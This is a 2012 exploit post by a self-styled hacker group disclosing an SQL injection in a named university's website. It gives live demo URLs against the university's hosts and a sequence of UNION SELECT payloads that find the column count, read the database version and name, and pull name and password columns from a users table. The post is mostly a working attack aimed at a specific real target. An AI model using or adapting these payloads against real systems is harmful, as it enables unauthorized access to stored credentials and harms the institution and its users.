Home / exploits Zanjan Azad University SQL Injection
Posted on 05 February 2012
|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=| |* ______ ____ __ __ | |* /\__ _/ _` / / | |* /_/ / L \ \_ { Turki$ hackers } | |* _ <' _ | |* L \ | |* \_ \____/ \_ \_ | |* /_/ /___/ /_//_/ | |* | |* Skote_vahshat and bl4ck.viper | |=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=| ========================================================================= * [Title] :[Zanjan Azad University injection vulnerability] /* * [Author] :[skote_vahshat] /* * [Home] :[Http://turk-bh.ir] /* * [Email] :[skote.vahshat@Gmail.Com] /* ========================================================================== /* /* /* /* Web Server: [ Microsoft-IIS/6.0 ] /* DB Server: [ MSAccess ] /* /* =================================================================== /* [+]Exploit : /* http://www.target.com/pages/index.asp?ID=[SQLi} /* /* [+] (target ) /* [.] (Demo ) /* http://www2.azu.ac.ir/pages/index.asp?ID=-142[sqli] /* http://ns1.azu.ac.ir/pages/index.asp?ID=142+union+select+1,name,3,4,5,6,7+from+users /* [+] /* [+]inject: /* +union+select+1,2,3,4,5,6,7 =>> column 2 /* union+select+1,@@version,3,4,5,6,7 /* union+select+1,database(),3,4,5,6,7 /* /* [+] (table) =>> users /* /* union+select+1,2,3,4,5,6,7from+users /* /* /* [+] column ( name # password ) /* / =================================================================================== |_***_|thanks: bl4ck.viper , dr.tofan , hellboy , netqurd , turk_server kingcope | |_***_| spical thnaks :all tbh member ,iraniyan hacker all turkiS hackers | ===================================================================================
